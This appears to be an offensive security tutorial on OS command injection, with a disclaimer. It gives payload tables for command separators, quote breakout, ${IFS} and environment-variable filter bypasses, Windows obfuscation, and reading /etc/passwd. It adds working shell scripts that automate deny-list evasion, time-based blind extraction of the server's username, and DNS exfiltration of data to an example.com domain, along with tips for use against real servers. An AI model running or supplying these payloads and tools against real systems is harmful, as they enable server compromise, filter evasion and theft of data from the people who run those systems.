Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information. We do not encourage any kind of illegal or harmful activity.
Command Injection
Command injection (OS command injection) occurs when an application passes untrusted input into a shell command line, letting an attacker execute arbitrary operating system commands on the server hosting the application. The commands run with the privileges of the application process, which can lead to unauthorized access to, or control over, the application's environment and the underlying system, potentially compromising the application and all of its data.
Identify Injection Points
- Parameter Injection: Check whether any request parameters (query string, form fields, JSON bodies) end up in a command that the server executes.
- Path Injection: Look for file names or paths that the application hands to command-line tools, and that can be manipulated to carry a command.
- Header Injection: Inspect HTTP headers (e.g., User-Agent, Referer) that the server may log or pass to external programs.
- Cookie Injection: Analyze cookie values that may be processed by shell commands.
Determine Context
- Quoted Context: The input lands inside quotes, so the payload must first close the surrounding quote (" or ') before a command separator takes effect. Command substitution ($() and backticks) still runs inside double quotes without any breakout.
- Unquoted Context: The input is appended directly to the command string, so a separator followed by a command is enough.
Basic Command Execution

| Technique | Description |
| --- | --- |
| `ls \|\| id` | Runs id only if ls fails (non-zero exit); useful when the injected text breaks the original command. |
| `ls \| id` | Pipes the output of ls into id; both commands execute. |
| `ls && id` | Runs id only if ls finishes successfully. |
| `ls & id` | Runs ls in the background and id in the foreground; the response usually shows only the output of id. |
| `ls %0A id` | Separates the commands with a URL-encoded newline (%0A), which the shell treats like a semicolon. |
| `` `ls` `` | Executes the command within backticks (command substitution); works even inside double quotes. |
| `$(ls)` | Executes the command within $(); works even inside double quotes. |
| `ls; id` | Chains commands with a semicolon; both run regardless of exit status. |
| `ls${IFS}id` | ${IFS} expands to whitespace, so it stands in for a space when spaces are filtered (here the shell runs `ls id`). |
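The two contexts and the separators above, run against a stand-in for a vulnerable back end. This is an added example written for this page, not code from the original: `vuln_unquoted`, `vuln_quoted`, `safe_cmd`, `space_filter`, `injected` and `ifs_bypass` are hypothetical names, and `echo Host:` takes the place of whatever command the application really builds (a ping or a file conversion in practice). The marker for "the injected command ran" is the `uid=` text that `id` prints.

```shell
#!/bin/sh
# Added example: stand-in for an application that builds a shell command
# from user input. All function names are hypothetical; `echo Host:` takes
# the place of the real command (e.g. ping) the application would run.

# Unquoted context: the input is concatenated bare into the command string.
vuln_unquoted() { sh -c "echo Host: $1" 2>/dev/null; }

# Quoted context: the input lands inside double quotes, so a separator only
# takes effect after the payload closes the quote. Command substitution
# ($(...) and backticks) is still expanded inside double quotes.
vuln_quoted() { sh -c "echo Host: \"$1\"" 2>/dev/null; }

# Hardened form: the input is passed as a single argument and never
# re-parsed by a shell, so separators and substitutions stay literal text.
safe_cmd() { printf 'Host: %s\n' "$1"; }

# Naive deny-list filter that rejects any payload containing a space;
# ${IFS} gets past it because the target shell produces the space later.
space_filter() { case "$1" in *" "*) return 1 ;; esac; return 0; }

# Returns 0 when running payload $2 through variant $1 executed `id`
# (its uid= output is the marker), 1 otherwise.
injected() { "$1" "$2" | grep -q 'uid='; }

# Space-filter bypass: the ${IFS} form passes the filter and still runs
# `id -u`; its output is checked against the real uid.
ifs_bypass() {
    p='x;id${IFS}-u'                        # ${IFS} stays literal here
    space_filter "$p" && vuln_unquoted "$p" | grep -qx "$(id -u)"
}

NL=$(printf '\n.'); NL=${NL%.}              # literal newline, what %0A decodes to

# Walk the separator table against both contexts.
for p in 'x; id' 'x && id' 'x || id' 'x | id' 'x & id' "x${NL}id" '`id`' '$(id)'; do
    u=no; q=no
    injected vuln_unquoted "$p" && u=yes
    injected vuln_quoted "$p" && q=yes
    printf '%-10s unquoted=%s quoted=%s\n' "$(printf '%s' "$p" | tr '\n' 'N')" "$u" "$q"
done
printf 'quoted breakout: %s\n' "$(injected vuln_quoted 'x"; id; echo "' && echo yes || echo no)"
printf 'safe_cmd prints: %s\n' "$(safe_cmd 'x; id')"
```

Running it shows every separator except `||` executing `id` in the unquoted variant (the `echo` before it succeeds, so `||` never reaches `id`), only the substitution forms and the `x"; id; echo "` breakout succeeding in the quoted variant, and `safe_cmd` printing the payload back as plain text.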
Bypass Protections
Unix-Specific Techniques

| Technique | Description |
| --- | --- |
| `> /var/www/html/out.txt` | Redirects the command's output into a file under the web root, so it can be fetched over HTTP when the response does not echo command output (blind injection). |
| `< /etc/passwd` | Feeds a file to the command's standard input, e.g. to read a file with a command that takes no path argument. |

Windows-Specific Techniques

| Technique | Description |
| --- | --- |
| `powershell.exe -Command "..."` | Executes a PowerShell command line from a cmd.exe context. |
| `cmd.exe /c "..."` | Runs the quoted command line through cmd.exe and exits. |

Limitation Bypasses

| Technique | Description |
| --- | --- |
| `powershell C:**2\n??e*d.*?` | Windows: PowerShell resolves wildcards in the path, here matching C:\Windows\System32\notepad.exe, so the executable name never appears literally for a filter to match. |
| `@^p^o^w^e^r^shell c:**32\c*?c.e?e` | Windows: ^ is the cmd.exe escape character and is stripped before execution (and @ suppresses echo), so the keyword powershell is never present literally; the wildcard path resolves to calc.exe. |
| `ls${LS_COLORS:10:1}${IFS}id` | Unix (bash): substring expansion pulls single characters out of environment variables. With the common default LS_COLORS (rs=0:di=01;34:...) offset 10 is a semicolon and ${IFS} supplies the space, producing `ls; id` without typing either character. |
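The `${LS_COLORS:10:1}` row relies on a variable that is usually only present in interactive shells (it is set by dircolors), so a web server's environment often lacks it. The following added example, written for this page and not taken from the original, generalises the trick: it searches the exported environment for any variable holding a blocked character and rewrites a payload with `${VAR:offset:1}` lookups (and `${IFS}` for spaces). `char_from_env`, `obfuscate`, `naive_filter` and `run_target` are hypothetical names, and the target is assumed to run bash, since `${VAR:off:1}` is a bash/ksh/zsh feature rather than POSIX sh.

```shell
#!/bin/sh
# Added example: generalising the ${LS_COLORS:10:1} trick. Given a payload
# and the characters a filter blocks, find each blocked character inside an
# exported environment variable and replace it with the bash substring
# expansion ${VAR:offset:1}; a blocked space becomes ${IFS}.
# Function names are hypothetical; the target is assumed to run bash.

# Print ${VAR:off:1} for the first exported variable whose value contains
# character $1; exit 1 when no variable has it. Names that are not plain
# identifiers (exported functions) and variables bash rewrites on startup
# (PWD, OLDPWD, SHLVL, _) are skipped, since their value on the target may
# differ from what `env` shows here.
char_from_env() {
    env | awk -v want="$1" '
        { eq = index($0, "="); if (eq == 0) next
          name = substr($0, 1, eq - 1); val = substr($0, eq + 1)
          if (name !~ /^[A-Za-z][A-Za-z0-9_]*$/) next
          if (name ~ /^(PWD|OLDPWD|SHLVL)$/) next
          i = index(val, want)
          if (i > 0) { printf "${%s:%d:1}\n", name, i - 1; found = 1; exit } }
        END { if (!found) exit 1 }'
}

# Rewrite payload $1 so that none of the characters listed in $2 appear in
# it literally. Prints nothing and returns 1 if a character cannot be
# sourced from the environment.
obfuscate() {
    payload=$1; blocked=$2; out=''
    while [ -n "$payload" ]; do
        c=$(printf '%.1s' "$payload"); payload=${payload#?}
        case "$blocked" in
            *"$c"*)
                if [ "$c" = ' ' ]; then rep='${IFS}'
                else rep=$(char_from_env "$c") || return 1
                fi ;;
            *) rep=$c ;;
        esac
        out="$out$rep"
    done
    printf '%s\n' "$out"
}

# Deny-list filter of the kind the rewrite has to get past: no spaces or
# slashes allowed in the input.
naive_filter() { case "$1" in *[\ /]*) return 1 ;; esac; return 0; }

# Stand-in for the vulnerable endpoint, which hands the string to bash.
run_target() { bash -c "echo Host: $1" 2>/dev/null; }

# Demo: read a file whose path contains slashes while spaces and slashes
# are blocked; reading /etc/passwd is what the trick is usually used for.
if p=$(obfuscate 'x;cat /etc/passwd' ' /'); then
    printf 'payload: %s\n' "$p"
    naive_filter "$p" && printf 'passes naive_filter; first lines:\n' && run_target "$p" | head -n 3
fi
```

`char_from_env` reads the attacker's own environment, which is only a guess at the target's; against a real server, confirm a candidate first with a harmless probe such as `echo${IFS}${PATH:0:1}` and compare the output to the expected character before building the full payload.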
Data Exfiltration
Time-Based Data Exfiltration

| Technique | Description |
| --- | --- |
| `time if [ $(whoami \| cut -c 1) == s ]; then sleep 5; fi` | Delays the response by 5 seconds only if the first character of the current user's name is s. When no command output is returned, iterate over positions and candidate characters and watch the response time to recover the value one character at a time. |
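The row above is a single probe; the full extraction is a loop around it. The following added example, written for this page and not part of the original, runs that loop against a local stand-in for the vulnerable endpoint. The only observable is whether the request exceeds a one-second deadline, which is what `curl --max-time` gives you against a real target; here `timeout(1)` from coreutils/busybox plays that role (it exits 124 when it has to kill the command). `VICTIM_USER` is a constructed value that a fake `whoami` returns, and `vuln_server`, `is_slow`, `probe` and `extract_user` are hypothetical names.

```shell
#!/bin/sh
# Added example: blind, time-based extraction of `whoami` output, one
# character per slow response. The server is a local stand-in and the
# username is a constructed constant; function names are hypothetical.

VICTIM_USER='www-data'   # constructed; the target's `whoami` answers this

# Stand-in for the vulnerable endpoint: the payload is appended, unquoted,
# to a shell command line. A fake whoami returns the constructed name so the
# probe can use the same `whoami | cut` form as the table row. The request
# is given a 1 s deadline, as curl --max-time would against a real target.
vuln_server() {
    timeout 1 sh -c "whoami() { echo '$VICTIM_USER'; }; echo x $1" >/dev/null 2>&1
}

# Timing oracle: timeout(1) exits 124 when it killed the command after the
# deadline, i.e. the injected `sleep` ran because the condition was true.
is_slow() { vuln_server "$1"; [ $? -eq 124 ]; }

# One probe, as in the table: delay iff character $1 of whoami equals $2.
probe() { printf '; if [ "$(whoami | cut -c %s)" = "%s" ]; then sleep 3; fi' "$1" "$2"; }

CHARSET='abcdefghijklmnopqrstuvwxyz0123456789-_'

# Recover the name one position at a time: try every candidate until one
# makes the request slow; a position where nothing matches is the end
# (cut -c N past the end of the string yields an empty line).
extract_user() {
    result=''; pos=1
    while :; do
        found=''
        for c in $(printf '%s' "$CHARSET" | sed 's/./& /g'); do
            if is_slow "$(probe "$pos" "$c")"; then found=$c; break; fi
        done
        [ -n "$found" ] || break
        result="$result$found"; pos=$((pos + 1))
    done
    printf '%s\n' "$result"
}

printf 'recovered user: %s\n' "$(extract_user)"
```

Each recovered character costs one slow request plus as many fast ones as there are candidates before it, so the linear scan is cheap only for short charsets. Against a real target, a binary search on the character (`[ "$(whoami | cut -c N)" \> "m" ]`) needs about seven requests per position regardless of the alphabet, at the price of more slow responses; either way, measure the baseline latency first and pick a sleep several times larger than its jitter.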
DNS-Based Data Exfiltration

| Technique | Description |
| --- | --- |
| `for i in $(ls /) ; do host "$i.example.com"; done` | Leaks each entry of / as a subdomain lookup; the attacker reads the names from the query logs of the authoritative name server for example.com. Works when the target has DNS resolution but no other outbound connectivity. |
| `$(host $(wget -h\|head -n1\|sed 's/[ ,]/-/g'\|tr -d '.').example.com)` | Embeds the first line of wget -h in a DNS name after replacing spaces and commas with hyphens and stripping dots, so the result is a single valid label. |
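The two rows above rewrite data into host names by hand, which breaks as soon as the data contains characters DNS does not allow or exceeds the 63-octet label limit. The following added example, written for this page and not part of the original, does the job systematically: the sender hex-encodes arbitrary bytes, splits them into numbered labels, and prints the names to query; the receiver reassembles the data from the names seen in the resolver log, tolerating reordering and retries. `dns_chunks`, `dns_reassemble`, `hex_encode`, `hex_decode` and the sample data are constructed for this illustration; `example.com` stands in for an attacker-controlled domain as on the page, and no lookups are actually made.

```shell
#!/bin/sh
# Added example: encoding stolen data into DNS query names and reassembling
# it from the resolver log on the attacker's side. Function names and the
# sample data are constructed; example.com stands in for an attacker-owned
# domain. The script only builds the names; it performs no lookups.

DNS_DOMAIN=example.com
CHUNK_HEX=60   # 30 bytes per label: a DNS label may hold at most 63 octets

# Hex-encode stdin. DNS labels allow only letters, digits and '-', and
# resolvers may change case, so hex is a safe alphabet for arbitrary bytes.
hex_encode() { od -An -v -tx1 | tr -d ' \n'; }

# Decode a hex string back to bytes using octal escapes, which POSIX printf
# understands (unlike \x escapes).
hex_decode() {
    h=$1; fmt=''
    while [ -n "$h" ]; do
        pair=$(printf '%.2s' "$h"); h=${h#??}
        fmt="$fmt\\$(printf '%03o' "$((0x$pair))")"
    done
    printf "$fmt"
}

# Sender side: split the data into numbered chunks and print one query name
# per line, e.g. 0.7569643d....example.com. The sequence label lets the
# receiver reorder queries that arrive out of order or are retried.
dns_chunks() {
    hex=$(printf '%s' "$1" | hex_encode)
    seq=0
    while [ -n "$hex" ]; do
        part=$(printf '%s' "$hex" | cut -c1-"$CHUNK_HEX")
        hex=$(printf '%s' "$hex" | cut -c"$((CHUNK_HEX + 1))"-)
        printf '%s.%s.%s\n' "$seq" "$part" "$DNS_DOMAIN"
        seq=$((seq + 1))
    done
}

# Receiver side: given the queried names (any order, duplicates allowed),
# sort by sequence number, drop repeats, and decode the concatenated hex.
dns_reassemble() {
    hex=$(printf '%s\n' "$1" | sort -t. -k1,1n -u | cut -d. -f2 | tr -d '\n')
    hex_decode "$hex"
}

# Demo with a constructed `id` output as the secret. On a target the loop
# would be: for q in $(dns_chunks "$(id)"); do host "$q"; done
SAMPLE='uid=33(www-data) gid=33(www-data) groups=33(www-data)'
names=$(dns_chunks "$SAMPLE")
printf 'queries to send:\n%s\n' "$names"
printf 'reassembled from shuffled log: %s\n' "$(dns_reassemble "$(printf '%s\n' "$names" | sort -r)")"
```

Hex doubles the size, so a single name (253 octets at most) carries at most about 100 bytes of data; base32 is denser but needs more code. Keep the sequence label, because the target's resolver will retry and cache, and the attacker's log will show names in whatever order they arrive.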